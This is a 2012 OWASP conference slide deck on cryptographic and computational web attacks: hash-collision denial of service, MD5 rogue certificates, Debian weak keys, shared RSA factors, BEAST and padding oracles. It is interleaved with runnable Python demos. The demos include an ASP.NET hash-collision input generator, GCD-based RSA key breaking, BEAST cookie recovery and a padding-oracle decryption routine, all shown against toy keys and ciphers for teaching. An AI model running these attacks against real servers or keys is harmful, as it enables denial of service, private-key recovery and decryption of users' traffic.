Malicious Math: Recent Real-World Cryptographical and Computational Threats on the Web
Derek Soeder, Ridgeway Internet Security, L.L.C. (derek @ ridgewayis.com)
OWASP Dallas, August 1, 2012

Content copyright © Ridgeway Internet Security, L.L.C. Template copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation http://www.owasp.org

Overview
• Hash collision denial of service (Dec. 2011)
• MD5 collision rogue cert. (July – Dec. 2008)
• Debian weak SSL keys (Sept. 2006 – May 2008)
• Insuff. key randomness (Dec. 2009 – Feb. 2012)
• BEAST client-side SSL attack (Sept. – Dec. 2011)
• Padding oracle decryption (Apr. – Sept. 2010)

Hash Collision Denial of Service

"Algorithmic complexity attacks"
• Crosby & Wallach paper (Aug. 2003)
• "Algorithmic complexity attacks": use knowledge of a system's algorithms to induce worst-case performance
• Many Web app frameworks keep field name-value pairs in hash tables
  • ASP.NET, Java, PHP, Python, Ruby, etc.
• Hash tables use hash functions
• Attacker can abuse predictable hash functions to produce the worst case

About Hash Tables
• List:
  • Looking up is slow
  • Adding an item means looking for it first, if duplicate items are not allowed
• Hash table:
  • Basically a bunch of lists
  • Looking up is less slow, if the lists are utilized evenly
  • Hash function decides in which list each item belongs

Hash Collision Denial of Service
• n.runs advisory (Dec. 2011):
  • Send hundreds of KBs to MBs of field names that all hash to a single value
  • Only one list of the hash table is utilized → looking up is slow, adding is slow
  • 100,000's of maximally inefficient look-ups and adds hog CPU time
  • More bang for the attacker's bandwidth

Hash Collision DoS – ASP.NET
• The hash function, MSCORWKS!HashString:

    for (dwhash = 5381; *pwch != 0; pwch++)
        dwhash = (dwhash * 33) ^ *pwch;

• Example collision: "0_" and "1~" both hash to 5859434
  • "0_": 5381 * 33 = 177573; 177573 ^ 48 ('0') = 177557; 177557 * 33 = 5859381; 5859381 ^ 95 ('_') = 5859434
  • "1~": 5381 * 33 = 177573; 177573 ^ 49 ('1') = 177556; 177556 * 33 = 5859348; 5859348 ^ 126 ('~') = 5859434

Hash Collision DoS – ASP.NET (2)
• n.runs advisory presents tricks to make computing hash collisions feasible
• Proof of concept with 10,000's of field names that all hash to 31337 in

Hash Collision DoS – ASP.NET Demo

MD5 Collision Rogue Certificate

A Brief History of MD5
• 1992: MD5 published as the latest cryptographic (secure) hash function
• 1993: early indication of weaknesses
• 1996: serious indication of weakness; switching to another algorithm recommended
• 2004: broken—collision computed in an hour
• 2005: "clearly broken"—colliding documents and certificates demonstrated
• 2006: BROKEN—collision computed in a minute
• 2008: CAs still issuing digital certificates with signed MD5 hash

Certificate Constraints – End Entity
(diagram not preserved)

Certificate Constraints – CA
(diagram not preserved)

MD5 Collision Rogue Certificate
• Did you know: MD5 is broken?
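Before going on to the MD5 material, the hash-collision DoS section above as an added example (not part of the original deck and not the n.runs advisory's own tooling): the slide's MSCORWKS!HashString in Python, a collision generator of my own construction that chains per-step sets of colliding 2-character blocks, and a minimal separate-chaining table that counts key comparisons so the worst case is visible. The field-name alphabet, the 12-step length and the benign control keys are assumptions made for this example.

```python
import itertools
import random
import string

MASK = 0xFFFFFFFF  # dwhash is a 32-bit DWORD


def hash_string(s):
    """MSCORWKS!HashString as shown on the slide: h = (h * 33) ^ c, seeded with 5381."""
    h = 5381
    for ch in s:
        h = ((h * 33) ^ ord(ch)) & MASK
    return h


# Characters assumed safe to use unescaped in a form field name (assumption for this example).
ALPHABET = string.ascii_letters + string.digits + "_-.~!*()"


def colliding_blocks(state, width=2):
    """Enumerate every `width`-char block, bucket by the state it reaches from `state`, and
    return (next_state, blocks) for the most crowded bucket.  Only the low 7 bits of a char
    enter the XOR, so the candidate states span a narrow range and many of them coincide."""
    buckets = {}
    for combo in itertools.product(ALPHABET, repeat=width):
        h = state
        for ch in combo:
            h = ((h * 33) ^ ord(ch)) & MASK
        buckets.setdefault(h, []).append("".join(combo))
    next_state, blocks = max(buckets.items(), key=lambda kv: len(kv[1]))
    return next_state, blocks


def generate_collisions(steps=12, limit=20000):
    """Chain `steps` block sets.  Every string that takes one block from each set passes
    through the same intermediate states, so all of them hash to the same 32-bit value,
    and the count grows multiplicatively with the number of steps."""
    state, sets = 5381, []
    for _ in range(steps):
        state, blocks = colliding_blocks(state)
        sets.append(blocks)
    names = []
    for parts in itertools.product(*sets):
        names.append("".join(parts))
        if len(names) >= limit:
            break
    return state, names


class ChainedTable:
    """Minimal separate-chaining hash table that counts key comparisons.  The bucket count
    does not help: identical 32-bit hashes land in the same bucket for any modulus."""

    def __init__(self, nbuckets=1024):
        self.buckets = [[] for _ in range(nbuckets)]
        self.comparisons = 0

    def insert(self, key, value):
        chain = self.buckets[hash_string(key) % len(self.buckets)]
        for i, (k, _) in enumerate(chain):
            self.comparisons += 1
            if k == key:
                chain[i] = (key, value)
                return
        chain.append((key, value))


def comparisons_for(keys):
    """Total key comparisons needed to insert `keys` into a fresh table."""
    table = ChainedTable()
    for k in keys:
        table.insert(k, None)
    return table.comparisons


def benign_keys(n, seed=0):
    """Constructed control input: random field names whose hashes spread over the buckets."""
    rng = random.Random(seed)
    return ["f" + "".join(rng.choice(string.ascii_lowercase) for _ in range(11)) for _ in range(n)]


if __name__ == "__main__":
    assert hash_string("0_") == hash_string("1~") == 5859434  # the slide's collision
    target, names = generate_collisions(limit=2000)
    print("%d distinct field names hash to %d" % (len(names), target))
    print("comparisons, colliding: %d   benign: %d"
          % (comparisons_for(names), comparisons_for(benign_keys(2000))))
```

Inserting n colliding names costs n(n-1)/2 comparisons against the one overloaded chain, which is the "maximally inefficient adds" the slide refers to; the benign control set of the same size costs a few thousand.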
• Chosen-prefix collision:
  • Real certificate and rogue certificate can start with whatever bytes (P and P')
  • Control of real and rogue middle bytes (A/B/NC and A'/B'/NC') produces the collision
  • Any end bytes (S) after NC and NC' need to be identical

MD5 Collision Rogue Certificate – P and P'
MD5 Collision Rogue Certificate – B and B'
MD5 Collision Rogue Certificate – NC and NC'
MD5 Collision Rogue Certificate – S
(diagrams of where each region sits in the real and rogue certificates; not preserved)

MD5 Collision Rogue Certificate – Attack
1. Predict all CA-determined fields
  • Serial number
  • Validity period (date and time in seconds)
2. Generate B/NC and B'/NC'
  • B/NC are buried in the public key submitted to the CA
  • B'/NC' are hidden in an ignored part of the rogue certificate
  • Only after the CA MD5's everything—serial no., validity period, public key, etc.—is there a collision, or not
3. Request the certificate at exactly the right time
  • With luck, the CA signs the predicted MD5 hash

MD5 Collision Rogue Certificate – No Demo
It helps to have this handy: (picture not preserved)

MD5 Collision Rogue Certificate – Coda
• June 2012: Microsoft stated Flame malware "used a cryptographic collision attack in combination with the terminal server licensing service certificates to sign code as if it came from Microsoft"
• SRD blog reported "signature algorithm on this certificate was md5RSA" with "validity periods and certificate serial numbers that could be predicted with high probability"
Did you know: MD5 is broken?
Public Service Announcement
• Microsoft to ban < 1024-bit RSA keys in August: http://blogs.technet.com/b/pki/archive/2012/06/12/rsa-keys-under-1024-bits-are-blocked.aspx
• 512-bit RSA keys rumored to have been factored (meaning the attacker determines the private key from the public key) and used in attacks in 2010-2011: http://blog.fox-it.com/2011/11/21/rsa-512certificates-abused-in-the-wild/

Debian Weak SSL Keys

Debian Weak SSL Keys
• In May 2006, a Debian developer commented out a line of OpenSSL code:

    static void ssleay_rand_add(const void *buf, int num, double add)
    {
        ...
        MD_Init(&m);
        MD_Update(&m,local_md,MD_DIGEST_LENGTH);
        ...
        /* MD_Update(&m,buf,j); */   /* the line that was commented out: buf holds the entropy being added */
        MD_Update(&m,(unsigned char *)&(md_c[0]),sizeof(md_c));
        MD_Final(&m,local_md);

• The change was accepted and shipped.
• In May 2008, someone realized an issue…

Debian Weak SSL Keys – Before and After
Before: (picture not preserved)   After: (picture not preserved)

Number of possible 1024-bit RSA keys:
  Before: 7,666,726,705,127,208,895,288,919,735,890,970,459,757,624,643,589,421,069,830,971,849,657,209,631,459,735,242,109,416,344,392,422,976,093,333,584,038,500,684,593,076,852,885,189,507,438,580,455,743,147,134,485,294,679,832,330,915,083,423,208,473,608,681,157,031,292,292,705,768,087,781,588,880,163,985,620,734,654,395,339,047,311,829,034,293,966,831,987,336,710,942,003,535,010,235,278,994,988,677,963,820 (about 7.7 × 10^303)
  After: roughly 98,301

Debian Weak SSL Keys – How Bad?
• With the crippled PRNG, the number of possible keys is:
  32767 possible process IDs × 3 OpenSSL .rnd file states = 98301 keys, per architecture (x86, x64, PowerPC, etc.) and per key size (512, 1024, 2048, etc.)
• Feasible to build a database of all possible keys
• Know the public key → look up the private key

Debian Weak SSL Keys – Repercussions
• All keys generated by the affected build are weak
  • Debian OpenSSL over a roughly two-year period
  • GnuPG unaffected (doesn't use OpenSSL)
• SSL/TLS communications negotiated using a weak key can be decrypted, forever
  • Changing your key doesn't delete my .pcap
• SSH accounts using public-key authentication with a weak key can be accessed

Debian Weak SSL Keys – Demo

Insufficient RSA Key Randomness

Insufficient RSA Key Randomness
• ~0.2% of RSA keys on the Web share a factor
• An RSA key has two secret, random prime factors
• If any two public keys share a prime factor, both private keys can be compromised

Insufficient RSA Key Randomness – How
• Public key n = secret prime p × secret prime q
• Let n1 = p1 × q1 and n2 = p2 × q2
• If p1 = p2, then n1 and n2 share a divisor (p)
  • Compute GCD(n1, n2) = p (way faster than factoring)
  • n1 ÷ p = q1
  • n2 ÷ p = q2
  • We can now compute both private keys, given only two public keys related by coincidence

Insufficient RSA Key Randomness – Where
• 11.4 million RSA public keys collected
  • Mostly SSL certificates, some PGP keys
  • EFF SSL Observatory: 7.2 million SSL certs
• 26,965 (~0.2%) shared a prime factor
• This did not seem to be related to the Debian issue

Insufficient RSA Key Randomness – Why?
• No one knows for sure…
• Likely poor PRNG seeding
  • Hypothesized that the first prime is weak (low entropy) and the second more random, due to entropy accumulated in the process → distinct key (p × q1), but breakable when GCD'ed with another key (p × q2) that happens to share the first prime
• One study found embedded devices most affected
• "Ron was wrong, Whit is right"?
  • Ronald Rivest – RSA, key uses two secrets
  • Whitfield Diffie – DH, key uses one secret

Insufficient RSA Key Randomness – Demo

Insufficient RSA Key Randomness – Fix
• So what can you do about this?
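Before the slide's answer, the attacker's side of the "How" slide above as an added example that is not part of the original deck: a collection of RSA keys is generated under a constructed model of the "weak first prime" hypothesis (p drawn from a generator with only four possible seeds, q from a properly seeded one), shared factors are found with GCD alone, and the private exponents are recovered and checked with an RSA round trip. The 64-bit prime size, the four-seed pool, the seed values and the key count are assumptions made so this runs in well under a second; nothing here is factored.

```python
import math
import random

# Bases that make Miller-Rabin deterministic for every n below 3 x 10^23; our 64-bit primes are far smaller.
MR_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_prime(n):
    if n < 2:
        return False
    for p in MR_BASES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for a in MR_BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(rng, bits=64):
    """Odd `bits`-bit prime drawn from `rng` (toy size: 64-bit primes give 128-bit moduli)."""
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_prime(cand):
            return cand


def weak_keygen(n_keys, e=65537):
    """Constructed model of the slide's hypothesis: p comes from a generator seeded with almost
    no entropy (one of only 4 seeds), q from a generator that has accumulated entropy."""
    weak_pool = [random_prime(random.Random(seed)) for seed in range(4)]
    good = random.Random(20120801)  # stands in for a properly seeded PRNG
    keys = []
    for _ in range(n_keys):
        p = weak_pool[good.randrange(len(weak_pool))]
        while True:
            q = random_prime(good)
            if q != p and math.gcd(e, (p - 1) * (q - 1)) == 1:
                break
        keys.append((p * q, e))
    return keys


def find_shared_factors(moduli):
    """Pairwise GCD over a key collection; returns {index: shared prime}.  Surveys of millions
    of keys use a product tree (batch GCD); pairwise is enough to show the idea."""
    shared = {}
    for i in range(len(moduli)):
        for j in range(i + 1, len(moduli)):
            g = math.gcd(moduli[i], moduli[j])
            if 1 < g < moduli[i]:  # g == n would be an identical key, not a shared factor
                shared[i], shared[j] = g, g
    return shared


def private_exponent(n, e, p):
    """With one factor known the other is a division away, and d follows from phi(n)."""
    q = n // p
    assert p * q == n, "p does not divide n"
    return pow(e, -1, (p - 1) * (q - 1))


def break_collection(keys):
    """Return {index: d} for every key whose modulus shares a prime with another key."""
    shared = find_shared_factors([n for n, _ in keys])
    return {i: private_exponent(keys[i][0], keys[i][1], p) for i, p in shared.items()}


if __name__ == "__main__":
    keys = weak_keygen(8)
    for i, d in break_collection(keys).items():
        n, e = keys[i]
        print("key %d broken; RSA round trip ok: %s" % (i, pow(pow(0xC0FFEE, e, n), d, n) == 0xC0FFEE))
```

With eight keys drawn from a pool of four possible p values, at least two keys must share a factor, and every key that shares one is broken by a GCD rather than by factoring. Keys whose p happens to be unique in the collection survive, which is the "related by coincidence" point on the slide.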
Nothing.

BEAST Client-Side SSL Attack

BEAST – Overview
• BEAST: Browser Exploit Against SSL/TLS
• Long-recognized vulnerability, finally exploited
• Impact:
  • Decrypt cookies sent via HTTPS
• Attack requires:
  • Man-in-the-Middle between victim and Internet
  • Agent in victim's browser (JavaScript, Java, etc.)
    • Able to send a cookie-bearing request and append to it indefinitely
  • Cipher Block Chaining encryption alg. for HTTPS
    • 3DES, AES, IDEA, RC2, etc.; not RC4

About Block Ciphers
• N plaintext bytes → N ciphertext bytes
  • N = block size, usually 8 or 16
• Same plaintext → same ciphertext (if same key)
• Electronic Codebook (ECB) mode:
    Plaintext:  Their Su rrogate  may inte rrogate
    Ciphertext: RGVyZWtX c25lYWt5 YXNIZXJl c25lYWt5
  (the two identical plaintext blocks "rrogate " produce identical ciphertext blocks)
• Cipher Block Chaining (CBC) scrambles each plaintext block using the previous ciphertext block:
    Plaintext:  Their Su IlNjcmFt YmxlIj1Y T1IgKF4p
    Ciphertext: RGVyZWtX SE9BSXQn c0FsbENo YW5nZWQh
  (the first block goes into the cipher as-is; each later block is shown after XOR with the previous ciphertext block, so the repeated "rrogate " no longer repeats)

BEAST – The Attack
• BEAST controls part of the HTTP request (the path) via the in-browser agent, and wants to decrypt cookies
• "Blockwise Chosen-Boundary Attack" (BCBA) to obtain one byte of the cookies at a time
  1. Insert bytes to shift the alignment of blocks, so that one block is [(N-1) known bytes + 1 unknown byte]
  2. Agent sends 1-256 guesses until encrypted guess = encrypted [(N-1) known bytes + 1 unknown byte]
  3. Now that the unknown byte is known, repeat for the next unknown byte

BEAST – BCBA HTTP Requests
(8-byte blocks; ←↓ marks CR LF, □ marks a space, ? marks a cookie byte not yet recovered)
    POST /AA  AAAAAA H  TTP/1.1←  ↓Cookie:
    POST /AA  AAAAA HT  TP/1.1←↓  Cookie:□
    POST /AA  AAAA HTT  P/1.1←↓C  ookie: L
    POST /AA  AAA HTTP  /1.1←↓Co  okie: LA
    POST /AA  AA HTTP/  1.1←↓Coo  kie: LA?
    POST /AA  A HTTP/1  .1←↓Cook  ie: LA??
    POST /AA  □HTTP/1.  1←↓Cooki  e: LA???
    POST /A□  HTTP/1.1  ←↓Cookie  : LA????
Each request drops one "A" from the path, so the next unknown cookie byte becomes the last byte of a block whose other seven bytes are known.

BEAST – The Attack (2)
• The BEAST Man-in-the-Middle sees the ciphertext
• Essential to the attack—BEAST must pre-scramble each guess plaintext to cancel out the CBC scrambling
  • Remember: CBC scrambles plaintext using ciphertext
• BEAST attack in full:
  1. Agent sends a partial request containing the BCBA bytes
  2. MitM sees the ciphertext, tells the agent what to guess
  3. Agent appends the guess to the request body
  4. Repeat at step 2 until the unknown byte is guessed
  5. Repeat at step 1 until all cookie bytes are guessed

From the BEAST's mouth...
(slide content not preserved)

BEAST – The Catch
• Many ways to send cookie-bearing requests:
  • JavaScript, Flash, HTML5, Java, Silverlight
• But fewer of these work for appending to the request:
  • JavaScript, Flash, HTML5, Java, Silverlight
• BEAST authors used Java, but needed a Same-Origin Policy bypass zero-day for the agent to work
  • Presumably Oracle has patched this by now
• Victim must run the BEAST agent while logged in
My take: Great research, real vulnerability, but not as serious as the browser-vuln-of-the-week

Padding Oracle Decryption

About Padding Oracles
• "Padding oracle" has nothing to do with Oracle (the company); it refers to an oracle in the classical sense
• Padding:
  • Block ciphers operate on N-byte blocks
  • Plaintext may not be a multiple of N bytes
  • PKCS#5 padding: pad the last block with bytes containing the padding count (1-N)
  • e.g., a 5-byte message in an 8-byte block is followed by three bytes of 0x03

About Padding Oracles (2)
• Oracle:
  • Responds to questions with crypt[ograph]ic answers based on supranormal knowledge
• Padding oracle:
    Q: Does this decrypt with correct padding? c25lYWt5 YW5nZWQh
    A: No.
    Q: How about this one? c25lYWt4 YW5nZWQh
    A: No.
    ...
    Q: How about this one? c25lYWtX YW5nZWQh
    A: Yes.
    Q: kthxbai~ ^o^

About Padding Oracles (3)
• Believe it or not, that's dangerous information
• Here's ASP.NET being obvious about it: (screenshot of the ASP.NET padding error page; not preserved)
• But really any difference indicating decryption failure will suffice

Padding Oracle Attack
• "Security Flaws Induced by CBC Padding" (Vaudenay, 2002):
• Attacker has ciphertext blocks he wants to decrypt, sends crafted guesses to the vulnerable server
• Server decrypts the guesses (into garbage, but that doesn't matter) and checks for valid padding:
  • One or two decrypted guesses will look correctly padded
  • The rest (≤ 255) will have invalid padding
  • Padding oracle indicates which is which to the attacker → this lets the attacker determine a byte of plaintext
• Attacker tweaks the guesses to guess the next byte; repeat

Padding Oracle Attack Illustrated
(diagram: the attacker replaces the previous ciphertext block with a control block X; the server's CBC decryption XORs the decrypted target block with X, producing a doubly scrambled plaintext, and answers "Is padding valid?" with Yes or No)

Padding Oracle Attack – ASP.NET
• WebResource.axd and ScriptResource.axd
• Used to retrieve resources in a way that should be opaque to the user; e.g.:
    <script src="/ScriptResource.axd?d=JuN78WBP_dBUR_BT9LH1wlP8mX-nNcENfktCX8YwH3sHG7wWwvn73TZaaChQhQtyzip3-kumGx1U67ntTt0sXKCn22VGvaQ3V4mXtCFgW9M1">
• The encrypted d= string refers to these files when decrypted:
    Q|~/Scripts/Script1.js,~/Scripts/Script2.js,~/Scripts/Script3.js|#|21c38a3a9b
• Other possibilities in .NET 3.5+
  • e.g., r#...|||~/Web.config
• Did I mention that the padding oracle can be used for encryption as well as decryption?

Padding Oracle Attack – ASP.NET Demo

Padding Oracle Attack – Whose Problem?
• ASP.NET
  • ASP.NET itself: read arbitrary files
  • DotNetNuke: remote code execution
• RubyOnRails
• Some captchas
• JavaServer Faces

Conclusion

Recap
• Hash collision denial of service (Dec. 2011)
• MD5 collision rogue cert. (July – Dec. 2008)
• Debian weak SSL keys (Sept. 2006 – May 2008)
• Insuff. key randomness (Dec. 2009 – Feb. 2012)
• BEAST client-side SSL attack (Sept. – Dec. 2011)
• Padding oracle decryption (Apr. – Sept. 2010)

Conclusion
• Uses fancy math ≠ safe
• As easy bugs decline, attackers are driven toward more exotic bugs where developers' security understanding is weaker
• Solutions:
  • Enable automatic updates for everything
  • Don't use MD5 for authentication (psst... it's broken)
  • Try to only use keys generated on a trusted, high-entropy system; get used to replacing keys

Questions?
Derek Soeder, Ridgeway Internet Security, L.L.C.
derek @ ridgewayis.com
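Both CBC attacks from the deck, BEAST's blockwise chosen-boundary attack and Vaudenay's padding oracle, as one added example that is not part of the original slides (one block, so the same toy cipher serves both). The 8-byte Feistel "cipher", the Tls10Session model of TLS 1.0's chained IVs, the request layout (which reproduces the "POST /AAAAAA HTTP/1.1 / Cookie:" block boundaries of the BCBA slide), the cookie value and the key are all constructed assumptions; the attacks themselves are the ones the slides describe, with the padding-oracle code handling the "one or two valid guesses" case on the last byte.

```python
import hashlib

BLOCK = 8  # toy block size, the same 8-byte blocks as the slides' illustrations

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def feistel(key, block, rounds):
    """4-round Feistel with a SHA-256 round function: a keyed bijection on 8-byte blocks that stands
    in for 3DES/AES so this runs offline.  Not a real cipher.  Encrypt: range(4); decrypt: reversed."""
    left, right = block[:4], block[4:]
    for r in rounds:
        left, right = right, xor(left, hashlib.sha256(key + bytes([r]) + right).digest()[:4])
    return right + left

def pad(data):  # PKCS#5: every pad byte holds the pad count, always at least one byte
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = feistel(key, xor(plaintext[i:i + BLOCK], prev), range(4))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ciphertext):
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return b"".join(xor(feistel(key, c, reversed(range(4))), p) for p, c in zip([iv] + blocks, blocks))

class Tls10Session:  # the TLS 1.0 behaviour BEAST relies on: a record's last ciphertext block is the next IV
    def __init__(self, key, iv):
        self.key, self.chain = key, iv
    def send_record(self, plaintext):
        ct = cbc_encrypt(self.key, self.chain, pad(plaintext))
        self.chain = ct[-BLOCK:]
        return ct

REQ_PREFIX, REQ_INFIX = b"POST ", b" HTTP/1.1\r\nCookie: "
SECRET_COOKIE = b"LA4f9z"  # constructed secret, known only to the victim's browser

def victim_request(path):
    return REQ_PREFIX + path + REQ_INFIX + SECRET_COOKIE + b"\r\n\r\n"

def align_path(k):
    """Path length that makes cookie byte k the LAST byte of a block (7 known bytes + 1 unknown)."""
    for n in range(1, BLOCK + 1):
        path = b"/" + b"A" * (n - 1)
        pos = len(REQ_PREFIX) + len(path) + len(REQ_INFIX) + k
        if pos % BLOCK == BLOCK - 1:
            return path, pos // BLOCK

def beast_attack(session, cookie_len):
    """Blockwise chosen-boundary attack: the agent sends the requests, the MitM reads the ciphertext."""
    recovered = b""
    for k in range(cookie_len):
        path, t = align_path(k)
        record = session.send_record(victim_request(path))
        target, prev = record[t * BLOCK:(t + 1) * BLOCK], record[(t - 1) * BLOCK:t * BLOCK]
        known7 = (REQ_PREFIX + path + REQ_INFIX + recovered)[t * BLOCK:t * BLOCK + BLOCK - 1]
        for g in range(256):
            # pre-scramble so the chaining cancels: E(guess ^ prev ^ chain ^ chain) == target iff guess is right
            probe = session.send_record(xor(xor(known7 + bytes([g]), prev), session.chain))
            if probe[:BLOCK] == target:
                recovered += bytes([g])
                break
    return recovered

def valid_padding(key, iv, ciphertext):
    """The server-side leak: a yes/no that depends only on whether the padding checks out."""
    try:
        unpad(cbc_decrypt(key, iv, ciphertext))
        return True
    except ValueError:
        return False

def padding_oracle_attack(oracle, iv, ciphertext):
    """Vaudenay: learn D_key(block) byte by byte through a control block, then XOR with the previous block."""
    plaintext, blocks = b"", [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    for b in range(1, len(blocks)):
        prev, target, inter = blocks[b - 1], blocks[b], bytearray(BLOCK)
        for i in range(BLOCK - 1, -1, -1):
            want = BLOCK - i  # padding value forced into positions i..BLOCK-1
            for g in range(256):
                control = bytearray([0] * i + [g] + [inter[j] ^ want for j in range(i + 1, BLOCK)])
                if not oracle(bytes(control), target):
                    continue
                if i == BLOCK - 1:  # "one or two" valid guesses: 0x01 vs. e.g. 0x02 0x02; disturb byte i-1 to tell
                    control[i - 1] ^= 0xFF
                    if not oracle(bytes(control), target):
                        continue
                inter[i] = g ^ want
                break
        plaintext += xor(inter, prev)
    return unpad(plaintext)
```

To run it: `beast_attack(Tls10Session(key, iv), len(SECRET_COOKIE))` returns the cookie using only ciphertext and the agent's ability to send chosen plaintext, and `padding_oracle_attack(lambda c, t: valid_padding(key, c, t), iv, ct)` recovers a CBC ciphertext from nothing but yes/no answers, about 256 queries per byte. Both attacks would work unchanged against a real block cipher in place of the toy Feistel, which is the point of the slides: the cipher is not what is broken.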